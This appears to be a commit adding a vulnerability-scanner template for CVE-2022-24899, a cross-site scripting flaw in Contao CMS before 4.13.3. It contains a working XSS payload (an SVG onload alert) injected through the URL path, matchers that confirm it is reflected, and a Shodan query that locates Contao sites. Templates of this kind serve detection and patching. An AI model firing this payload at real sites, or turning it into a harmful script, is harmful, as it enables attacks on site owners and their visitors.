Create CVE-2022-24899.yaml
parent
f7308a3796
commit
a0c43b88d2
|
@ -0,0 +1,36 @@
|
|||
id: CVE-2022-24899
|
||||
|
||||
info:
|
||||
name: Contao 4.13.2 - Cross-Site Scripting (XSS)
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: |
|
||||
Contao is a powerful open source CMS that allows you to create professional websites and scalable web applications. In versions of Contao prior to 4.13.3 it is possible to inject code into the canonical tag. As a workaround users may disable canonical tags in the root page settings.
|
||||
reference:
|
||||
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
|
||||
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-24899
|
||||
metadata:
|
||||
shodan-query: title:"Contao"
|
||||
tags: cve,cve2022,contao,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/contao/%22%3E%3Csvg%2F%2Fonload%3Dalert%28%27document.domain%27%29%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "><svg//onload=alert(document.domain)>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue